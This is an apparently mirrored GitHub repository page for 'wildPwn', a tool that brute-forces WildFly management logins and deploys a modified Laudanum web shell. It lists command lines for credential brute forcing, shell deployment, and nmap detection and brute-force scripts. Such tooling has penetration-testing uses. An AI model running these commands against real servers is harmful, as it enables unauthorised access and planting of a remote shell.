Giters

hlldz / wildPwn

Brute forcer and shell deployer for WildFly

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

wildPwn - WildFly Exploitation Tool

It is a tool for WildFly. Tool can be used to brute force or shell deploy. wildPwn.war contains modified Laudanum Shell. userList.txt contains common usernames and passList.txt contains common passwords.

Usage

Bruteforce

python wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST>

Shell Deploy

python wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>

Details

https://artofpwn.com/wildfly-exploitation.html

Video

PoC Video

Nmap Scripts

Detection

nmap --script wildfly-detect <TARGET>

Brute Force

nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>

About

Brute forcer and shell deployer for WildFly

License:GNU General Public License v3.0

Languages

Language:Python 55.4%Language:Lua 44.6%